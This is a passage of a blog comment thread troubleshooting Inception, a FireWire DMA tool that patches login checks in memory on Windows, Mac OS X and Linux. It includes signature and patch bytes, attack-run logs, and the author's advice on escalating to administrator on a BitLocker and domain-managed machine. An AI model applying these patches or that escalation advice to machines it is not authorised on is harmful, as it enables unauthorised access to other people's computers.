            I tested now with a XP SP3 box. After connecting the firewire and firing inception the configuration screen displays a new device “Unknown Vendor and Model IEEE1394 SBP2 device”.
            I also tested a Win7 box, this displayed “Linux Firewire Unknown Model”.

            Where did I do something wrong?

          • Carsten

            And did you try to reboot the host system as I suggested above? I understand that you attack from a live CD and that you’ll have to reinstall Inception, but as you seem to have loaded/unloaded quite a few FireWire modules that may be the source of the problem.

            Also, if you are using a FireWire expansion card on the host side, make sure you keep this plugged in while rebooting. Ubuntu’s support for hotplugging is not really stable.

          • goldfish

            The host was rebooted, Inception reinstalled. The E4300 has a built-in firewire port so this is not the problem.

          • Carsten

            Hmm. I’m unable to reproduce this error on any of my hardware. I’ve tested this on 3 different Lenovo computers and two Apple Macs, using both built-in and expansion ports. I’ve never heard of this problem before.

            I don’t have any LiveCDs to test from though, and that may be the issue. Suggest you try to attack from a permanent install, and/or another machine (or an expansion card). This may be a HW problem at your DELL.

            Failing both attacking from a permanent install and another machine, please open a ticket at github describing the problem with as much detail as possible (HW, chipsets, OS version, inception version, etc.).

          • goldfish

            I spent both last night and the whole day testing Inception without any luck. Tested on 3 laptops, both from life cd and hdd installed, all give the same (wrong) result “No firewire devices detected on the bus”. Obviously I am doing something wrong, but what?
            The ticket you suggested is opened. Thanks sofar.
            Paul

  18. james

    Wow, please tell me I’ve found a tool to my problem – I forgotten my notebook (Win7 Bitlocker) adminstrator password and can only login now as a normal user. Can’t boot from usb or cd to run offline tools which won’t work anyway with bitlocker.

    Will I be able to use inception to allow me to login as administrator with any password and then proceed to reset it or alternatively create another admin account to save the day?

    Reply
    • Carsten

      Yes – that should work (provided that I remember the bitlocker architecture correctly). I haven’t tested this, though.

      Just use ‘runas’ or ‘run as administrator’ to run the user management app after Inception is done patching.

      Reply
  19. Alex

    I used your tool to crack my OS, I have a question tha the VT-d of Intel cannot protect the DMA attackers? Or, I am confused about why the IOMMU not defense to prevent such a attacker.

    Reply
  20. Konrads

    On one Windows Vista machine, I get an error:
    The driver has detected a device with old or out-of-date firmware. The device will not be used.
    Source:sbp2port
    Event ID: 25
    EventData: \Device\Sbp2\Linux Firewire&UNKNOWN_MODEL&0&354fc000_0d4e3890_Instance00
    0F0000000100000000000000190004C0960300009C0000C000000000000000000000000000000000

    Reply
    • Carsten

      Interesting. You don’t write anything about what happens on the client side though, can you fill out a detailed issue on github?

      Reply
      • Konrads

        Just added an issue on github re Windows Vista. Let me know if you need more information.

        Reply
  21. Zeliz

    Could you let this tool modify the kernel? the lib-pam is in the userspace, so pam based authentication is overwrite in userspace.

    Reply
  22. Zeliz

    I want to dump the memory of a specif address region, my address is like 0xeb5f5499, so in your dump mode, I typed incept -d 0xeb5f5499, so I use in the right way? Because I don’t see what I want. Thanks

    Reply
    • Carsten

      No, that’s not the right way. Use incept -h to get a description on how to use the dump mode. And remember that physical memory address != virtual memory address.

      Reply
      • Zeliz

        Thanks! For now I want to use this tool modify a address, which I have already found in dump file. so how can I change the settings or other files to make this. I just need to modify this place, no matter what kind of, just change the location of signature to my place? In `settings`? Thanks!

        Reply
        • Carsten

          I’ll add a mode where you can specify signature, patch and offset from the command line. Stand by for a new release in a week or so. If you are in a hurry you can modify settings.py.

          Reply
  23. Berklin

    I am not clear about the signature locations, because for ubuntu is:
    Offsets: 0xebd, 0xbaf, 0xa7f
    Signature: 0x83f81f89c774
    Patch: 0xbf00000000eb
    But when I got the result from attacking, it shows:
    Searching, 3368 MiB so far. Sample data read: 0x894424108d44
    Signature found at 0xd281dbaf (@page # 862237)
    Data written: 0x0xbf00000000eb
    Data read: 0x0xbf00000000eb

    for the `Sample data read` didn’t match to Signature, and for the Patch also didn’t match to the `Data written`, why?
    Thanks

    Reply
    • Carsten

      The sample data read doesn’t match the signature because the tool only outputs data read every 128 page or so (that’s why it’s called a ‘sample’).

      The patch does match the data written in your example above, so I guess I’m not sure I know what your asking?

      Reply
    • Carsten

      BackTrack doesn’t load FireWire drivers when you hotplug a device into the machine.

      Issue the following command:

      modprobe firewire-ohci firewire-sbp2

      in the terminal on your BT machine to load the drivers on the victim side into the kernel. Because of this, BT is also not vulnerable to the attack by default. Good on the people that configured BT – secure defaults is a good thing.

      If you still are having trouble, verify that the cable and interfaces actually work by connecting a real FW device (such as a hard drive) to both the victim and the host, using the same cable.

      Reply
  24. etudiant404

    Hi

    I am studying the DMA issue. Inception is a very good tool, thank’s a lot for this. I noticed it is also possible to do DMA attack with an old Ipod. I have one but I don’t manage to use it in the correct way…
    Any clues please ?

    Thank’s in advance !

    Reply
    • Carsten

      I’ve experimented with the iPod option itself, the problem is that the iPodLinux (http://en.wikipedia.org/wiki/IPodLinux / http://ipodlinuxinstl.sourceforge.net/) project is not that active anymore, it relies on the old linux firewire stack, and that 1-3G iPods with firewire are not easy to come by. The best I can do is to urge you to read the documentation on the iPodLinux site.

      Inception will not work on an iPod as it uses the new Linux JuJu FireWire stack (introduced in the 2.6.31 Linux kernel). You would have to use winlockpwn.

      Reply
      • etudiant404

        Ok

        Sorry for this late answer and thank’s for your quick answer. I will check out with winlockpwn. And if it doesn’t work due to the program is too old, I will use a laptop as a demo tool. The main point for me is to have a support to do some attack example for potential customers and doing this from an Ipod is more impressive and furtive than from another computer.

        However, thank’s again !

        Reply
  25. Nickless

    Hi Carsten,

    great tool. I tested it a coule of times against a 12.04 victim and it worked well.
    But after a week or so it doesn’t work anymore! Nothing changed, same victim, same attacker, same cable. Tried different cables. Als booted victim machine in Windows.
    Also installed Backtrack 5R3 on attacker machine.
    I now always get the message:
    [!] FireWire modules do not seem to be loaded. Load them? [Y/n]: y
    [!] Could not initialize FireWire. Are the modules loaded into the kernel?
    [!] Attack unsuccessful

    lsmod | grep fire shows:
    firewire_ohci 40172 0
    firewire_core 56906 1 firewire_ohci
    crc_itu_t 12627 1 firewire_core

    If i unplug the cable and put it back in I get:
    [!] No FireWire devices detected on the bus
    [!] Attack unsuccessful

    Any idea what could be happening here?

    Reply
    • Carsten

      Not really easy to say what this could be, I’ve never experienced this myself. I haven’t tested Inception with BT5R3 yet, so have that in mind.

      This sounds like an error on the host side of the connection. Have you tried to recompile and reinstall the libforensic1394 libraries? I would also have a look at what the command dmesg outputs before and after you plug/unplug the cable.

      I would also test that the FireWire interfaces on both sides (host and victim) still works. Good luck!

      Reply
  26. sgh

    Awesome tool. Has anyone got this working over a Thunderbolt cable yet? I’m connecting a Mac Mini with BT5 to a retina MBP and pickpocket isn’t detecting the latter.

    Reply
      • Carsten

        It works over Thunderbolt, kinda. You have to use a FireWire to Thunderbolt converter (available at the Apple store), as Thunderbolt to Thunderbolt won’t work (the tool is using FireWire DMA to gain access as of now).

        Reply
        • sgh

          Interesting. I got the adapter, but still no success. Even more strange, rebooting with only FW plugged in (adapter-less) now yields “No FireWire devices detected on the bus/Attach unsuccessful” even though lspci detects the controller.

          Reply
          • Carsten

            Does other modes than pickpocket work?

            Unfortunately, I’m unable to assist you with hardware issues as it is hard for me to debug remotely. If you find a bug, please submit to github after making absolutely sure it’s not a harware issue.

  27. void

    Hi,
    I’ve been unsuccesful in attacking Win7 x64 enterprise from BT5r3.
    Steps taken:
    Check BIOS on both machines to see if IEEE1394 port is enabled.
    Connected both laptops (HDD LED on victim machine goes flashing for a while, so it’s being recognised/installed it seems, also the ‘Device Manager’ screen refreshed itself a couple of times.
    Output on BT:
    root@bt:~/Desktop/carmaa-inception-5e0426e# ./bt5-setup.sh

    [+] Setting up the environment
    [-] ‘firewire-ohci’ mod already loaded – skipping
    [-] Directory ‘/pentest/forensics/IR’ already exists – skipping
    [+] Downloading & installing required files
    [-] ‘cmake’ already installed – skipping
    [-] ‘python3′ already installed – skipping
    [-] ‘libforensic1394-0.2.tar.gz’ already downloaded – skipping
    [+] Building ‘libforensic1394-0.2′ …
    [-] Directory ‘inception’ already exists – skipping
    [+] Launching inception

    _| _| _| _|_|_| _|_|_|_| _|_|_| _|_|_| _| _|_| _| _|
    _| _|_| _| _| _| _| _| _| _| _| _| _|_| _|
    _| _| _| _| _| _|_|_| _|_|_| _| _| _| _| _| _| _|
    _| _| _|_| _| _| _| _| _| _| _| _| _|_|
    _| _| _| _|_|_| _|_|_|_| _| _| _| _|_| _| _|

    v.0.1.4 (C) Carsten Maartmann-Moe 2012
    Download: http://breaknenter.org/projects/inception | Twitter: @breaknenter

    [!] No FireWire devices detected on the bus
    [!] Attack unsuccessful

    [ 172.611925] firewire_ohci 0000:86:09.0: PCI INT A -> GSI 20 (level, low) -> IRQ 20
    [ 172.611931] firewire_ohci 0000:86:09.0: setting latency timer to 64
    [ 172.676377] firewire_ohci: Added fw-ohci device 0000:86:09.0, OHCI v1.10, 4 IR + 4 IT contexts, quirks 0×11
    [ 173.176134] firewire_core: created device fw0: GUID 5566778811223344, S400
    [ 174.808267] firewire_core: refreshed device fw0
    [ 177.028532] firewire_core: refreshed device fw0

    root@bt:~/Desktop/carmaa-inception-5e0426e# lsmod |grep fire
    firewire_ohci 39964 0
    firewire_core 61165 1 firewire_ohci
    crc_itu_t 12579 1 firewire_core

    I’ve seen your comment that you didn’t test with BT5r3 yet, but perhaps I can help you assist in troubleshooting, let me know if you need more info/output.
    Thanks!

    Reply
    • Carsten

      I just tested inception from BT5R3 against two different machines running fully updated Win7 x64, both succeeded. This is likely a hardware problem, especially since you cannot see any other devices on the FW bus.

      What kind of FW cable are you using (4/6/9 pin)? Are you using an express card on the BT5 side?

      Reply
      • void

        Thats odd, must be a hardware thing than.
        I’m using the 4 pins on both sides, I don’t know if that’s a problem?
        I heard someone say firewire has a cross cable thing like ethernet has, but I couldn’t find much about it.
        Just to be sure I don’t do anything wrong, could you do a step by step run down of how you successfully attacked?
        The problem with testing is that I don’t have any other firewire hardware, esspecially with 4 pins connector available :/
        Thanks for your time!

        Reply
        • Carsten

          There’s nothing really much of a process for attacking:

          1. Attach host and victim
          2. Run the tool

          Unfortunately, I’m unable to assist you with hardware issues as it is hard for me to debug remotely. If you find a bug, please submit to github after making absolutely sure it’s not a harware issue. That includes testing your hardware with a FireWire device.

          Reply
  28. Fu

    Hi Carsten
    It’s great tool. I tried your tool in Windows 7 32-bit machine it worked great.
    But when i tried it in Windows 7 64-bit machine it didn’t worked. I checked the signature for my operating system and updated tool. Program says that it found the signature and patched but i can’t logged in the system. I dumped the memory and see tool wrote memory really. I couldn’t solved the problem. Do you have any idea?

    Reply
      • Fu

        msv1_o.dll version 6.1.7600.16385,
        Windows 7 Ultimate 64 bit,
        signatures 0×291, 0x2a8, 0×321, 0x2a2, 0x2a1, 0x6a2

        Reply
        • Carsten

          Thanks, will look into it. This sounds like a false positive, have you tried to run the tool twice in a row (i.e., let the tool patch twice)?

          Reply
          • Fu

            I run the tool almost thirteen times and finally it worked. it took really long time.
            do you have any idea about how this problem could be fixed?

          • Carsten

            You’ve got to give me a more detailed description than that. Please describe, in detail, the events that led to success. Did it patch every time? Did it get DMA? etc.

          • Fu

            Unfortunately it didn’t patch everytime. did it get DMA?? I didn’t understand what you mean. If it don’t get DMA, it will never work. Am I wrong?

          • Carsten

            Use the -v switch to see if you’re getting data (you should see sample bytes being displayed). You may not be getting DMA every time. Also, see the question above: How much RAM does your target have?

          • Carsten

            See the troubleshooting/caveat section above. The signature may be situated above 2 GB, which you may not be able to read.

  29. Fu

    Could the signatures be variable or something else? My trial on Windows 7 64 bit a little odd. I know the exact signature and offset.The tool sometimes works. But sometimes although searching through the all memory tool couldn’t find any sign. I run it more than one in a row but it didn’t give me a stable solution. I tried it in two different windows 7 64 bit systems (have different offsets). Am i doing something wrong? Could you suggest a solution about that?

    Reply
  30. Thilaknath

    Hi Carsten ,I found this toll pretty much interesting and the way in which it penetrates the opponents system, can you please help me out on providing some study materials on how exactly inception manages to read the victims ram and over write it with the code .

    Thank you

    Reply
  31. Igor

    I tried your script against Windows 7 x86 with 2GB RAM and Windows 7 x64 with 4 GB RAM and I was successfull. On the x64 machine altough the system was not usable after login in, every app crashed.

    Then I tried Mac Mini with Mac OS 10.7.2 and 4 GM RAM and Macbook Pro with Mac OS 10.7.2 with no luck. The script writes that the DMA shield is down, reads the whole 4 GB of memory but with no success. Any idea where may be the problem?

    Reply
    • Carsten

      What servicepack? On what offset is the tool patching? Read the article above and post an issue on github.

      For the macs, use -v to see if you actually have DMA. Again, read the troubleshooting section above.

      Reply
  32. AJ

    Hello! Great tool! Ran into a problem though!

    I got it to work. Was all happy about it. Then I turned off both my machines. Now having them powered up again and trying to do the same it does not work.

    As my Linux (Ubuntu 12.02 LTS) machine sees its firewire and having the drivers on my win 7 64-bit machine, same as yesterday, when I type incept it keeps telling me that there is no device detected. Also tried it on a second win vista pc but the same message. I have read all the above, FAQ and all but have not managed to get it working for a second time.

    Any relevant tips or suggestions are welcome!

    Reply
  33. J3ster

    Curious if others have experience to share with regards to the two points below.

    - Does the DLL patching work when the victim machine has been hardened with renamed local admin accounts?

    - What about local Windows versions in different languages than English?

    Great tool.

    Reply
    • Carsten

      The tool patches the authentication mechanism itself, what accounts you have on the system doesn’t matter, all accounts will be unlocked.

      Have only tried a Norwegian version of XP and that worked, language shouldn’t matter. If you find that it does, please submit a bug on github.

      Reply
  34. Jesse

    I was wondering if Inception will be changed to look over 4gb of ram. As it gets more common to have more ram these days!?

    Nice tool btw. Iǘe learned a lot lately.. all for educational purposes! I am enjoying the knowledge!

    Reply
    • Carsten

      The 4 GiB limit is not imposed by Inception, but by the fact that FireWire uses 32-bit addressing. There’s no way of getting around that limit using FireWire, unfortunately.

      Reply
  35. Will

    Hello, I’m pretty new at this, and I’m getting the cable tomorrow, but I was wondering if I would be able to use this with a firewire and adapter to thunderbolt, from my macbook pro mid 2012 to a macbook air mid 2012 (only has thunderbolt). Once I connect the 2, I should be able to use this tool? Any help would be great, thank you in advance!

    Reply
  36. samet

    Hi,

    I’ve tried it between windows 7 x64 SP1 (HP Elitebook 8460p && 8gb RAM) and Backtrack 5r3. However it does not work. I checked offset information with IDA and it’s truth. After searching memory (4096 mb), the program says that “attack unsuccessful and then Windows 7 freezes. It does not respond anything (even mouse does not work). What may the problem ?

    Regards,

    Reply
    • Carsten

      See the troubleshooting section above.

      The DLLs that Inception patches in-memory may be located above 4 GiB in RAM, which is not accessible to FireWire. This is a known issue with x64 Windows 7 and up machines.

      If you want to test you could remove one of the memory modules and re-test with only 4 GiB of RAM.

      Reply
      • Jeroen

        Typically it stops with the error message somewhere in between 60 – 80%. Same Setup works fine on other target systems.

        Reply
  37. newf

    Hi
    I am trying your tool in BackTrack 5. I followed the instruction above and none gave error. then when i run the tool it gave this error

    ImportError: No module named forensic1394.bus

    I copied libforensic1394 files into /usr/lib folder bu it didn’t solved my problem.
    Do you have any idea about this error?

    Reply
    • Carsten

      Removed a small typo in the install instructions (‘../’). Make sure you’ve installed the pyhton3 bindings for the libforensic1394 library by going to the libforensic1394-0.2/python source directory and execute ‘sudo pyhton3 setup.py install’.

      Reply
  38. Thilaknath

    Hi I have tried to use inception on the following configuration listed below

    firewire ( 4 pin cable)
    Target OS : Windows 7 with a 4gb ram,
    Host OS: Backtrack 5 v r3,
    i have installed libforensic library and python 3 binding but still after numerous efforts it displays the logo of inception and prints
    ATTACK UNSUCESSFULL, no firewire device found, but the cable seems to work fine ,
    i think the problem is backtrack OS is not able to detect the firewire port , can you please help me out

    Reply
    • Carsten

      The tool works perfectly from BackTrack, that’s the OS I’m using all the time. Check your hardware, BIOS settings and cable.

      Reply
  39. funguy

    Congratulation. Works perfect on Mac Book Pro 7 with running ubuntu 12.10 lts , 8gb ram, 64 bit)
    It reset the password of the screensaver on my home machine to anything.
    (also running ubuntu 12.10 lts , 3 gb ram, 32 bit)
    Great work. (not ironic)

    I strongly suggest you now help the community to fix this huge problem.
    Countermeasurer Ideas or suggestions would be a good help.

    Reply
    • Carsten

      See linked resources above for countermeasures. I guess I disagree about the “hugeness” of the problem, but I agree that it is a problem that needs to be fixed.

      Reply
  40. r

    Hi

    How does inception patch memory ? isn’t there some page protection enforcement ?
    as far as I know, even if you use DMA you can’t bypass page protection mechanism :/

    Maybe you could explain the magic which is done behind the scenes ? (or refer to the code) ?

    Reply
  41. Cote

    So the only way to protect against this is to disable FireWire in the bios for Desktop PCs? For a laptop, just disable PCMCIA/ExpressCards SDIO and Thunderbolt?

    Reply
  42. Kurious

    Attack on Window 7 Enterprise 64bit machine with bitlocker appears to be successful. Firewire detected, attack reported as successful. However, no elevated rights, and can’t seem to log on with any password to obtain administrator rights. Only two local logon accounts available, with the Administrator account disabled. Only logon I have available is my domain logon with restricted rights. Any suggestions on how to gain administrator rights?

    Reply
        • Carsten

          Maybe you could try to open a command shell as Administrator after running the tool (Right click cmd.exe -> Run as administrator)? You may have to disconnect from the network (e.g., the AD domain) to force a local check of the cached password as opposed to a full AD check.

          Reply
  43. Fabi

    Quick question from a newbie: Would it also be possible to search for a file path in RAM and replace it with another file path? If yes, how would that work and could I do it using your -m switch?

    Reply
    • Carsten

      You can search for anything that is loaded in memory. File paths may be loaded at different offsets within pages between re-boots, so you may have trouble locating them reliably without doing a sequential search, which will likely yield a lot of false positives. If the file path is hardcoded in a binary, it will be loaded at the same offset within a memory page each time, which will make it easier to locate it. That’s the way Inception works – it searches for signatures at pre-determined offsets within the memory pages.

      Take a look at inception/cfg.py for more on the way the signatures are structured.

      Reply
  44. Fabi

    Ok I see. How would that work, I mean would it be difficult for me to modify inception in order to do that?

    Reply
  45. skies

    Hi,
    I’ve noticed that inception freezes/bluescreens the windows target if shared memory for the graphic card is used as soon as inception touches the shared memory areas.
    Of course, that is not an inception problem and probably cannot be fixed, so I just wanted to let you know and ask for confirmation and maybe a note could be taken for others wondering why the target freezes.

    Reply
  46. where can i buy phen375

    Hello there! I know this is kinda off topic however I’d figured I’d ask.
    Would you be interested in exchanging links or maybe guest writing
    a blog post or vice-versa? My site covers a lot of the same subjects as yours and
    I feel we could greatly benefit from each other.
    If you’re interested feel free to shoot me an email. I look forward to hearing from you! Great blog by the way!

    Reply
  47. Erik Westrup

    How do you, in Linux, find where pam_authenticate() is usually placed in real memory? I’be been trying to pass a memory dump from fmem to strings etc. Running “nm -D /lib/i386-linux-gnu/libpam.so.0 | grep authenticate” gives the internal lib offset, I believe.

    Reply
    • Carsten

      You won’t be able to predict where it is placed in memory – but you can predict where within a single memory page certain parts of the code is loaded. To generate signatures for Inception you’ll have to reverse engineer the binary of the function you want to locate – e.g. the binary containing pam_authenticate() – and find the offset of the code you want to change.

      Reply
  48. Max

    Hi Carsten , I m trying to install inseption on a osx and after install it when i try to run it i get this error:
    ImportError: cannot import name firewire

    Traceback (most recent call last):
    File “./incept”, line 27, in
    from inception import firewire, screenlock, memdump, pickpocket, cfg, util, term
    File “/opt/local/src/inception/inception/screenlock.py”, line 24, in
    from inception import firewire, cfg, sound, util, term
    ImportError: cannot import name firewire

    Thanks in advance for your help

    Reply
    • Sebastian

      @Max: this means your forensic1394 packet is not installed properly. After building it go to /forensic1394/python dir and do a “sudo python3 setup.py install”

      osx installation instructions are pretty bad :(

      Reply
  49. James

    Since you are able to use this to attack a machine with a Thunderbolt port by using a Thunderbolt / FW adapter, why would it not work using a Thunderbolt-Thunderbolt cable? It seems that the victim machine is already “speaking” Thunderbolt.

    Reply
  50. crabbies

    Can this attack work if both machines only have express card slots? If so what cable would be used? Presume it would still work as still direct access?

    Reply
  51. LipAir

    Hello i have install inception on IMac 10.8 and collegate with me Win7. Me Harddisk D: is closing with Bitlocker;

    Last login: Mon Feb 25 20:19:43 on ttys000
    /Users/LipAir/forensic1394/python/inception/forensic1394/python/inception/incept ; exit;
    LipAirs-iMac:~ LipAir$ /Users/LipAir/forensic1394/python/inception/forensic1394/python/inception/incept ; exit;
    Traceback (most recent call last):
    File “/Users/LipAir/forensic1394/python/inception/forensic1394/python/inception/incept”, line 27, in
    from inception import firewire, screenlock, memdump, pickpocket, cfg, util, term
    File “/Users/LipAir/forensic1394/python/inception/forensic1394/python/inception/inception/firewire.py”, line 33, in
    from forensic1394.bus import Bus
    File “/Library/Frameworks/Python.framework/Versions/3.3/lib/python3.3/site-packages/forensic1394/__init__.py”, line 1, in
    from .bus import Bus
    File “/Library/Frameworks/Python.framework/Versions/3.3/lib/python3.3/site-packages/forensic1394/bus.py”, line 25, in
    from forensic1394.functions import forensic1394_alloc, forensic1394_destroy, \
    File “/Library/Frameworks/Python.framework/Versions/3.3/lib/python3.3/site-packages/forensic1394/functions.py”, line 32, in
    raise ImportError
    ImportError
    logout

    can you help me??

    thx
    LipAir

    Reply
  52. Frank Luo

    I have a laptop with BitLocker encrypted but lost the key, Is that possible for me to use Inception to get recovery key?

    Reply
  53. Paul

    attacking windows 8 x64 failed. I analyzed the dumped memory of victim, the signature+offset seem match with the value of cfg.py. it’s weird… any hint?

    Reply
  54. Josh

    Is there a way to use the tool to extract the entire 4GB memory region ? will that crash the target because of mapped PCI regions ?

    Reply
  55. Ruslan

    Hello everyone.
    First of all thanks to Carsten for the great tool.
    The main reason of my post is addressed to the people, having troubles with “no firewire device found”.
    I have experimented with the tool long enough and found following:
    If you have fw in lspci, if you have firewire_ohci, firewire_spb2 in lsdev and still have no firewire device found – change the cable. 95% is a cable trouble, even if it worked just a day before. It sounds strange, but I have tripple-checked that fact, using several cables, connecting to three different PC’s with different fw cards – and I’m sure. The first my cable worked just fine for a week or so, but one day tool stops working, giving the annoying error. I have killed about four days, inspecting all kind of software reasons, cuz I thought it’s not a hardware. Then, at last I have tryed to change the cable – and it works for couple of times. It was a sad surprise, when the new cable stops working again. I have buyed three different cables and at last found the one, which works perfect. So, if you expecting troubles i suggest the very first thing – if you have possibility to use 6-pin to 6-pin cable – make or buy the 6-pin cable with only 4 pins connected: 3 to 5, 5 to 3, 4 to 6, and 6 to 4. 1 and 2 should not be connected. This is the only cable, that always works. Sorry for possible mistakes, i’m not native english speaker.

    Reply
    • Carsten

      This is a very good point. I’ll create a link to the amazon products I know are working 100 % of the times for me.

      In my experience as well, the cable is at fault 95 % of the times.

      Reply
  56. Fritz

    Hi, Inception seems not working booting Windows in “Safe Mode” (via F8). Working in Safe Mode would be an interesting feature, given that some device control management solutions are not configured or even don´t work in safe mode. Will there be an update so that Inception will work in safe mode as well?

    Thanks very much & kind regards!

    Fritz.

    Reply
  57. Jeroen

    Problem with MacOS 10.6.8. Log:

    root@loeniks:/opt/inception# ./incept -v

    _| _| _| _|_|_| _|_|_|_| _|_|_| _|_|_| _| _|_| _| _|
    _| _|_| _| _| _| _| _| _| _| _| _| _|_| _|
    _| _| _| _| _| _|_|_| _|_|_| _| _| _| _| _| _| _|
    _| _| _|_| _| _| _| _| _| _| _| _| _|_|
    _| _| _| _|_|_| _|_|_|_| _| _| _| _|_| _| _|

    v.0.2.5 (C) Carsten Maartmann-Moe 2013
    Download: http://breaknenter.org/projects/inception | Twitter: @breaknenter

    [*] FireWire devices on the bus (names may appear blank):
    —————————————————————————————————————————————–
    [1] Vendor (ID): Apple Computer, Inc. (0xa27) | Product (ID): Macintosh (0xa)
    —————————————————————————————————————————————–
    [*] Only one device present, device auto-selected as target
    [*] Selected device: Apple Computer, Inc.
    [*] Available targets (known signatures):
    —————————————————————————————————————————————–
    [1] Windows 8: msv1_0.dll MsvpPasswordValidate unlock/privilege escalation
    [2] Windows 7: msv1_0.dll MsvpPasswordValidate unlock/privilege escalation
    [3] Windows Vista: msv1_0.dll MsvpPasswordValidate unlock/privilege escalation
    [4] Windows XP: msv1_0.dll MsvpPasswordValidate unlock/privilege escalation
    [5] Mac OS X: DirectoryService/OpenDirectory unlock/privilege escalation
    [6] Ubuntu: libpam unlock/privilege escalation
    [7] Linux Mint: libpam unlock/privilege escalation
    —————————————————————————————————————————————–
    [?] Please select target (or enter ‘q’ to quit): 5
    [*] Selected target: Mac OS X: DirectoryService/OpenDirectory unlock/privilege escalation
    [*] The target module contains the following signatures:
    —————————————————————————————————————————————–
    Versions: 10.6.4, 10.6.8, 10.7.3, 10.8.2
    Architectures: x86, x64

    Offsets: 0x7cf
    Signature: 0x41bff6c8ffff48c78588
    Patch: 0x41bf0000000048c78588
    Patch offset: 0×0

    Offsets: 0xbff
    Signature: 0x41bff6c8ffff
    Patch: 0x41bf00000000
    Patch offset: 0×0

    Offsets: 0x82f
    Signature: 0xc78580f6fffff6c8ffff
    Patch: 0xc78580f6ffff00000000
    Patch offset: 0×0

    Offsets: 0xfa7
    Signature: 0xfb689d8eb0231c04883c4785b415c415d415e415f5dc3
    Patch: 0x31dbffc3
    Patch offset: 0×0

    Offsets: 0×334
    Signature: 0x88d84883c4685b415c415d415e415f5d
    Patch: 0xb001
    Patch offset: 0×0
    —————————————————————————————————————————————–
    [|] Initializing bus and enabling SBP-2, please wait 1 seconds or press Ctrl+C
    [*] DMA shields should be down by now. Attacking…
    [==> ] 309 MiB ( 8%) {000075b2498934fc}
    [*] Signature found at 0x13573bff in page no. 79219
    [!] Um, something went wrong: forensic1394_read_device_v: Bad I/O request size
    —————————————————————————————————————————————–
    Traceback (most recent call last):
    File “./incept”, line 200, in main
    address, page = screenlock.attack(targets)
    File “/opt/inception/inception/screenlock.py”, line 303, in attack
    success, backup = patch(device, address, chunks)
    File “/opt/inception/inception/screenlock.py”, line 133, in patch
    backup = device.read(address, cfg.PAGESIZE)
    File “/usr/local/lib/python3.2/dist-packages/forensic1394/device.py”, line 48, in newf
    return f(self, *args, **kwargs)
    File “/usr/local/lib/python3.2/dist-packages/forensic1394/device.py”, line 158, in read
    self._readreq(list(zip(addrs, lens)), buf)
    File “/usr/local/lib/python3.2/dist-packages/forensic1394/device.py”, line 134, in _readreq
    forensic1394_read_device_v(self, creq, len(creq))
    File “/usr/local/lib/python3.2/dist-packages/forensic1394/errors.py”, line 61, in process_result
    raise IOError(err)
    IOError: forensic1394_read_device_v: Bad I/O request size
    —————————————————————————————————————————————–
    root@loeniks:/opt/inception#

    Reply
  58. Jeroen

    Problem with pickpocket mode. Log:

    root@loeniks:/opt/inception# ./incept -v –pickpocket

    _| _| _| _|_|_| _|_|_|_| _|_|_| _|_|_| _| _|_| _| _|
    _| _|_| _| _| _| _| _| _| _| _| _| _|_| _|
    _| _| _| _| _| _|_|_| _|_|_| _| _| _| _| _| _| _|
    _| _| _|_| _| _| _| _| _| _| _| _| _|_|
    _| _| _| _|_|_| _|_|_|_| _| _| _| _|_| _| _|

    v.0.2.5 (C) Carsten Maartmann-Moe 2013
    Download: http://breaknenter.org/projects/inception | Twitter: @breaknenter

    [!] Um, something went wrong: ‘module’ object has no attribute ‘wrapper’
    —————————————————————————————————————————————–
    Traceback (most recent call last):
    File “./incept”, line 198, in main
    pickpocket.lurk()
    File “/opt/inception/inception/pickpocket.py”, line 37, in lurk
    s = ‘\n’.join(term.wrapper.wrap(‘[-] Lurking in the shrubbery ‘ +
    AttributeError: ‘module’ object has no attribute ‘wrapper’
    —————————————————————————————————————————————–

    Fix: change line 37 in pickpocket.py to:

    s = ‘\n[-] Lurking in the shrubbery, waiting for a device to connect, Ctrl-C to abort\r’

    Reply
  59. Jeroen

    Problem with reading ~3+ GiB of memory. Happens in all modes. Inception aborts, target system may or may not freeze. Same problem on both Apple hw (tested on 10.6, 10.7. 10.8) and Windows PC (tested on 7 x64). Attacker is Ubuntu 12.04.02 LTS x64. Problem happen with both integrated and ExpressCard interface. Log:

    root@loeniks:/opt/inception# ./incept -v –pickpocket

    _| _| _| _|_|_| _|_|_|_| _|_|_| _|_|_| _| _|_| _| _|
    _| _|_| _| _| _| _| _| _| _| _| _| _|_| _|
    _| _| _| _| _| _|_|_| _|_|_| _| _| _| _| _| _| _|
    _| _| _|_| _| _| _| _| _| _| _| _| _|_|
    _| _| _| _|_|_| _|_|_|_| _| _| _| _|_| _| _|

    v.0.2.5 (C) Carsten Maartmann-Moe 2013
    Download: http://breaknenter.org/projects/inception | Twitter: @breaknenter

    [-] Lurking in the shrubbery, waiting for a device to connect, Ctrl-C to abort
    [*] FireWire device detected
    [*] Dumping from 0×100000 to 0×100000000, a total of 4095 MiB
    [*] FireWire devices on the bus (names may appear blank):
    —————————————————————————————————————————————–
    [1] Vendor (ID): Apple Computer, Inc. (0xa27) | Product (ID): Macintosh (0xa)
    —————————————————————————————————————————————–
    [*] Only one device present, device auto-selected as target
    [*] Selected device: Apple Computer, Inc.
    [-] Initializing bus and enabling SBP-2, please wait 1 seconds or press Ctrl+C
    [!] Um, something went wrong: forensic1394_read_device_v: I/O timeoutffffffffff}
    —————————————————————————————————————————————–
    Traceback (most recent call last):
    File “./incept”, line 198, in main
    pickpocket.lurk()
    File “/opt/inception/inception/pickpocket.py”, line 51, in lurk
    memdump.dump(start, end)
    File “/opt/inception/inception/memdump.py”, line 81, in dump
    data = device.read(i, requestsize)
    File “/usr/local/lib/python3.2/dist-packages/forensic1394/device.py”, line 48, in newf
    return f(self, *args, **kwargs)
    File “/usr/local/lib/python3.2/dist-packages/forensic1394/device.py”, line 158, in read
    self._readreq(list(zip(addrs, lens)), buf)
    File “/usr/local/lib/python3.2/dist-packages/forensic1394/device.py”, line 134, in _readreq
    forensic1394_read_device_v(self, creq, len(creq))
    File “/usr/local/lib/python3.2/dist-packages/forensic1394/errors.py”, line 61, in process_result
    raise IOError(err)
    IOError: forensic1394_read_device_v: I/O timeout
    —————————————————————————————————————————————–
    root@loeniks:/opt/inception#

    Any clues about howto debug this issue? Tx!

    Reply
  60. Tommy

    Hardware embedded encryption of drive much faster than OS encryption and prevents DMA. Did you know that the NSA just finished building a humungous new super Q-bit data crypto-analysis computer complex and that it just went online last September 2012 (Wired magazine article “Inside the Matrix” April-2012 issue). Mr Control Freak just used your American tax dollars to fund the electric anal probe to rape the world with. Our privacy is now finally completely F**ked to H**l. The saddest part of this is that I don’t think they’re smart enough to realize that this same technology will someday be used against them also.

    Reply
